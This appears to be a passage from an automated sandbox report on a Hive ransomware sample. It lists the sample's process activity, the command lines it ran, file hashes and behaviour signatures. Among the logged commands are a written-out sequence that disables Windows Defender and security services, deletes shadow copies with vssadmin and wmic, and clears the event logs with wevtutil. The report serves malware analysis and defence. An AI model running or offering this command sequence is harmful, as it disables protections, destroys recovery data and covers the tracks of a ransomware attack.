Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1620 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 528 wrote to memory of 704 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 528 wrote to memory of 704 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 528 wrote to memory of 704 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 528 wrote to memory of 704 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1620 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 564 wrote to memory of 1540 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 564 wrote to memory of 1540 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 564 wrote to memory of 1540 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 564 wrote to memory of 1540 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1620 wrote to memory of 816 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 816 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 816 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 816 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 816 wrote to memory of 1988 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 816 wrote to memory of 1988 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 816 wrote to memory of 1988 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 816 wrote to memory of 1988 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1620 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1216 wrote to memory of 1064 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1216 wrote to memory of 1064 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1216 wrote to memory of 1064 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1216 wrote to memory of 1064 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1620 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 912 wrote to memory of 748 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 912 wrote to memory of 748 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 912 wrote to memory of 748 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 912 wrote to memory of 748 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1620 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1440 wrote to memory of 1512 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1440 wrote to memory of 1512 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1440 wrote to memory of 1512 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1440 wrote to memory of 1512 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1620 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1528 wrote to memory of 1304 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1528 wrote to memory of 1304 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1528 wrote to memory of 1304 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1528 wrote to memory of 1304 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1620 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1620 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 844 wrote to memory of 1520 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 844 wrote to memory of 1520 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 844 wrote to memory of 1520 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 844 wrote to memory of 1520 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe

Processes

C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe

"C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe"

C:\Windows\SysWOW64\net.exe

net.exe stop "NetMsmqActivator" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SamSs" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "VSS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "wbengine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "WebClient" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SysWOW64\sc.exe

sc.exe config "NetMsmqActivator" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl application

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

N/A

Files

memory/528-54-0x0000000000000000-mapping.dmp

memory/704-55-0x0000000000000000-mapping.dmp

memory/564-56-0x0000000000000000-mapping.dmp

memory/1540-57-0x0000000000000000-mapping.dmp

memory/816-58-0x0000000000000000-mapping.dmp

memory/1988-59-0x0000000000000000-mapping.dmp

memory/1216-60-0x0000000000000000-mapping.dmp

memory/1064-61-0x0000000000000000-mapping.dmp

memory/912-62-0x0000000000000000-mapping.dmp

memory/748-63-0x0000000000000000-mapping.dmp

memory/1440-64-0x0000000000000000-mapping.dmp

memory/1512-65-0x0000000000000000-mapping.dmp

memory/1528-66-0x0000000000000000-mapping.dmp

memory/1304-67-0x0000000000000000-mapping.dmp

memory/844-68-0x0000000000000000-mapping.dmp

memory/1520-69-0x0000000000000000-mapping.dmp

memory/1736-70-0x0000000000000000-mapping.dmp

memory/1168-71-0x0000000000000000-mapping.dmp

memory/1748-72-0x0000000000000000-mapping.dmp

memory/1352-73-0x0000000000000000-mapping.dmp

memory/1500-74-0x0000000000000000-mapping.dmp

memory/1704-75-0x0000000000000000-mapping.dmp

memory/1700-76-0x0000000000000000-mapping.dmp

memory/756-77-0x0000000000000000-mapping.dmp

memory/1232-78-0x0000000000000000-mapping.dmp

memory/1940-79-0x0000000000000000-mapping.dmp

memory/520-80-0x0000000000000000-mapping.dmp

memory/1944-81-0x0000000000000000-mapping.dmp

memory/748-82-0x0000000000000000-mapping.dmp

memory/660-83-0x0000000000000000-mapping.dmp

memory/1140-84-0x0000000000000000-mapping.dmp

memory/1664-85-0x0000000000000000-mapping.dmp

memory/1120-86-0x0000000000000000-mapping.dmp

memory/1456-87-0x0000000000000000-mapping.dmp

memory/1840-88-0x0000000000000000-mapping.dmp

memory/1492-89-0x0000000000000000-mapping.dmp

memory/1864-90-0x0000000000000000-mapping.dmp

memory/1340-91-0x0000000000000000-mapping.dmp

memory/1212-92-0x0000000000000000-mapping.dmp

memory/576-93-0x0000000000000000-mapping.dmp

memory/1148-94-0x0000000000000000-mapping.dmp

memory/824-95-0x0000000000000000-mapping.dmp

memory/1172-96-0x0000000000000000-mapping.dmp

memory/1520-97-0x0000000000000000-mapping.dmp

memory/1896-98-0x0000000000000000-mapping.dmp

memory/1652-99-0x0000000000000000-mapping.dmp

memory/1600-100-0x0000000000000000-mapping.dmp

memory/476-101-0x0000000000000000-mapping.dmp

memory/1988-102-0x0000000000000000-mapping.dmp

memory/1768-103-0x0000000000000000-mapping.dmp

memory/1056-104-0x0000000000000000-mapping.dmp

memory/1996-105-0x0000000000000000-mapping.dmp

memory/1908-106-0x0000000000000000-mapping.dmp

memory/1300-107-0x0000000000000000-mapping.dmp

memory/704-108-0x0000000000000000-mapping.dmp

memory/972-109-0x0000000000000000-mapping.dmp

memory/1108-110-0x0000000000000000-mapping.dmp

memory/1924-111-0x0000000000000000-mapping.dmp

memory/1540-112-0x0000000000000000-mapping.dmp

memory/1888-113-0x0000000000000000-mapping.dmp

memory/1384-114-0x0000000000000000-mapping.dmp

memory/1468-115-0x0000000000000000-mapping.dmp

memory/992-116-0x0000000000000000-mapping.dmp

memory/2084-117-0x0000000000000000-mapping.dmp

memory/2140-118-0x0000000075AE1000-0x0000000075AE3000-memory.dmp

memory/2140-119-0x0000000002420000-0x0000000002421000-memory.dmp

memory/2140-120-0x0000000002421000-0x0000000002422000-memory.dmp

memory/2140-121-0x0000000002422000-0x0000000002424000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 d73cb42dee1426dc868f355bf4e56362
SHA1 cb49cd833729049646ea1f7d47cdbcde302cf107
SHA256 ac3839aa72501764cc688345b0e4a2924f80a324280fef5f8eaa8a9db81b0b81
SHA512 d4dec8c95ae1265f91a2885aa9ef46458c26583bf261111f2d8569d3f4243b0e734da0a2bb0933f59c361e30b0af9931717b4d3a3176d583561b316ff186666c

memory/2220-124-0x00000000022D0000-0x0000000002F1A000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-13 14:14

Reported

2022-01-13 14:19

Platform

win10-en-20211208

Max time kernel

288s

Max time network

179s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Hive

ransomware hive

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\SysWOW64\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\ConvertToLock.tif => C:\Users\Admin\Pictures\ConvertToLock.tif.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_c42iGssX7900.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Users\Admin\Pictures\ConvertToLock.tif.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_c42iGssX7900.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File renamed C:\Users\Admin\Pictures\FormatSplit.crw => C:\Users\Admin\Pictures\FormatSplit.crw.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_TwRkFi3RdEA0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Users\Admin\Pictures\SyncExport.tiff.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_JRHBmUgIVEc0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File renamed C:\Users\Admin\Pictures\UpdateDismount.raw => C:\Users\Admin\Pictures\UpdateDismount.raw.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_goKKq6AwGLU0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Users\Admin\Pictures\FormatSplit.crw.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_TwRkFi3RdEA0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File renamed C:\Users\Admin\Pictures\ReceiveSkip.png => C:\Users\Admin\Pictures\ReceiveSkip.png.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_OTAloexLCdo0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Users\Admin\Pictures\ReceiveSkip.png.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_OTAloexLCdo0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File renamed C:\Users\Admin\Pictures\SyncExport.tiff => C:\Users\Admin\Pictures\SyncExport.tiff.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_JRHBmUgIVEc0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Users\Admin\Pictures\UpdateDismount.raw.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_goKKq6AwGLU0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Internet Explorer\en-US\iexplore.exe.mui C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\FPA_f14\FA000000014.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_xPwlAq0jtq80.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\Assets\Retail\Retail_Get_Started_icon.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\RTL\contrast-white\LargeTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
